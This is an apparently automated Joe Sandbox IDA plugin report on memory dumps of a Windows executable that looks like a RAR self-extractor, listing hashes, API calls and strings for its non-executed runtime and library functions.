Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction ID: b774124163f6bd5e161cc00fffa60b40a7621531dd811975f314de877e5256aa
Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction Fuzzy Hash: CAC08C21F09502C1DA087B26C8C901813A4BB45B04B604034C50CC1160EE2CC4EA9385

Non-executed Functions

Function 00007FF64D3576D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF64D357751
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64D357769
RtlVirtualUnwind.KERNEL32 ref: 00007FF64D3577A4
IsDebuggerPresent.KERNEL32 ref: 00007FF64D3577DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64D3577E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64D3577F2

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction ID: 273d6a60a3f5391fa2f0cb7c8ca567cb9703647f4a135f2aca41761e2928aaff
Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction Fuzzy Hash: 65317436A08F8185DB61EF25E8502AEB3A0FB89B54F540135EA8D83B99EF3CD545C700

Function 00007FF64D35E650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64D35E7CD

Strings

nan, xrefs: 00007FF64D35E6B8
nan(ind), xrefs: 00007FF64D35E706
INF, xrefs: 00007FF64D35E6C3
NAN, xrefs: 00007FF64D35E6B1
NAN(IND), xrefs: 00007FF64D35E6FB
NAN(SNAN), xrefs: 00007FF64D35E6E5
nan(snan), xrefs: 00007FF64D35E6F0
inf, xrefs: 00007FF64D35E6D6

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction ID: da4bf95334642b57ac178f195d1f30389e23f4314ca5ae2f2b2777a2bfd555d3
Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction Fuzzy Hash: F241CD72E09B4189E716EF24E8517AD77E4EB19798F004136EE8C93B58EE3CD025C344

Function 00007FF64D346E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64D347E9B), ref: 00007FF64D347080
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34717B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D347181
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D347187

Strings

<html>, xrefs: 00007FF64D346F13
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF64D346F2C, 00007FF64D346F3B
</html>, xrefs: 00007FF64D346F72, 00007FF64D346F81
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF64D346ED5, 00007FF64D346EE4

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2721297748-1533471033
Opcode ID: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
Instruction ID: db6cb17aaad64f29228fadc74323e3801ffaf1d15264fa22dc00b6ffa286d5b8
Opcode Fuzzy Hash: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
Instruction Fuzzy Hash: 9781AEA2F1CA0285FB02FBA5D8502EDA371AF4A788F405135DE1D9769AFE3DD50AC344

Function 00007FF64D34AE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF64D34AEAE

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Item$Text
String ID: LICENSEDLG
API String ID: 1601838975-2177901306
Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction ID: 369c8d4df2bbde4039a13a7956e4cbef3e77a4512b7c2bdd283313c2c52ab61b
Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction Fuzzy Hash: 4641A325E0CA1282F712BB15E854779A3A1AF86F85F044035E90EC3BA5EF7EE945C300

Function 00007FF64D351604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D35162B
GetProcAddress.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D351648
GetProcAddress.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D351664

Strings

KERNEL32.DLL, xrefs: 00007FF64D351624
ReleaseSRWLockExclusive, xrefs: 00007FF64D351653
AcquireSRWLockExclusive, xrefs: 00007FF64D35163E

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction ID: 33d9dd73a86f7e81d6175a0738be6eb1aa9a59cc3dec2d9030320cfb61258e7f
Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction Fuzzy Hash: 0711C921E1EB0282FE67BB11B960278E3E56F4A798F5D5435DC1DC6790FE7CA8848710

Function 00007FF64D337918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D337C8C

Strings

sfx, xrefs: 00007FF64D3379F3, 00007FF64D337A02
exe, xrefs: 00007FF64D3379AF, 00007FF64D3379BE
.rar, xrefs: 00007FF64D337969, 00007FF64D337978
rar, xrefs: 00007FF64D337A9B, 00007FF64D337AAA, 00007FF64D337B67, 00007FF64D337B7C

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
Instruction ID: 5a8cdf124213e4332b4a19640fd5b20d38fda94d3202c0c960e50b5e1d4a1869
Opcode Fuzzy Hash: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
Instruction Fuzzy Hash: 53A1E262E1CA4690EB02BF25E9542BCA361BF46BA8F001235DD1D87BE5EF7CE541C340

Function 00007FF64D32CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64D32D03D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32D0D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32D0D7

Part of subcall function 00007FF64D32DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF64D32CF4B), ref: 00007FF64D32DE27
Part of subcall function 00007FF64D32DE04: GetLastError.KERNEL32 ref: 00007FF64D32DE88
Part of subcall function 00007FF64D32DE04: CloseHandle.KERNEL32 ref: 00007FF64D32DE9B

Strings

SeSecurityPrivilege, xrefs: 00007FF64D32CF3F
SeRestorePrivilege, xrefs: 00007FF64D32CF5E

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
Instruction ID: ecb97b09b6a6822784ebbc1c8da194293451c7af66bc8f9875abf03981603a19
Opcode Fuzzy Hash: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
Instruction Fuzzy Hash: 7151C562F1C74145FB12FB65E8512FDA3A0AF467A8F044135DE1D976E6FE3CA485C280

Function 00007FF64D34FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00007FF64D34FF34, 00007FF64D34FF99
RENAMEDLG, xrefs: 00007FF64D34FF60

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction ID: 9602cb73329f0eaa78341484b5c6a2a2278ceaa77d295e924008ae787303f323
Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction Fuzzy Hash: 3B21E566E0DB4791FA12BB56E844175E7A1EF4BB88F580036F98DC7260EE3DE5988300

Function 00007FF64D3645C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64D364605

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction ID: cfacd50457315481ed232896ba0e6a3f458f270949f84c4b9c86cb72e7e4b701
Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction Fuzzy Hash: 1681DE22E1C65289F732BB65D8506BDA6A0BB47B88F445135DE0ED3B95EF3CA446C310

Function 00007FF64D363F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF64D364767), ref: 00007FF64D363F91
WideCharToMultiByte.KERNEL32 ref: 00007FF64D36406D
WriteFile.KERNEL32 ref: 00007FF64D364093
WriteFile.KERNEL32 ref: 00007FF64D3640D2
GetLastError.KERNEL32 ref: 00007FF64D36410A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction ID: 8c6ee60384eef3ac6ee6d539ba49d093ad8c24725119e5b4c31d98715ac60c86
Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction Fuzzy Hash: AE51A232E1CA5185E722EB65E4443ACBBB1FB4AB98F049135DE4A97A98EF38D145C700

Function 00007FF64D351E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64D334DF4), ref: 00007FF64D351E87
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64D334DF4), ref: 00007FF64D351F09
SysAllocString.OLEAUT32 ref: 00007FF64D351F16

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
Instruction ID: e1774a551c9f9202e7217bf315b7848775163e1924c6b22158dda26037262f96
Opcode Fuzzy Hash: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
Instruction Fuzzy Hash: BA41A126E0D64689EB16BF219460279B2D1EF0ABE8F184734EA6DC77D5EF3CE5518300

Function 00007FF64D3656D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF64D3656FF
_set_statfp.LIBCMT ref: 00007FF64D36571A
_set_statfp.LIBCMT ref: 00007FF64D365736
_set_statfp.LIBCMT ref: 00007FF64D365772

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: 328b02175a505d37891c7526f7997ac826af79e4d74475c8c9d4af4019e20cb2
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: 4E119176E1CA0781FA763124E94E3BD91416F773A0F486234EA7E8A6D6FE2CA4404205

Function 00007FF64D34FE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF64D34FE41
GetMessageW.USER32 ref: 00007FF64D34FE58
TranslateMessage.USER32 ref: 00007FF64D34FE63
DispatchMessageW.USER32 ref: 00007FF64D34FE6E
WaitForSingleObject.KERNEL32 ref: 00007FF64D34FE7C

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction ID: 25341adf4fe0c801bb3c6eacea8b4ee6a205b0481a94b2a233b21d158dad3d25
Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction Fuzzy Hash: 46F01221F3C55682F751B760E455B7AA391FFE6B06F481031F54EC1994EE2DE549C700

Function 00007FF64D3566A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D355210: abort.LIBCMT ref: 00007FF64D355223

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64D35674A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF64D356776

Strings

csm, xrefs: 00007FF64D356876

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: 13229203a3b1ec62068bfa800fa41aa7232faf6fa09d1594881fbb64f822ed9f
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: 1F515E72A1C78287D661BF16E45026EB7A4FB8AB90F140134EF8D87B55EF38E450CB01

Function 00007FF64D3490B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF64D3490D9
GetObjectW.GDI32 ref: 00007FF64D349107
ReleaseDC.USER32 ref: 00007FF64D3491BB

Strings

, xrefs: 00007FF64D349153

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
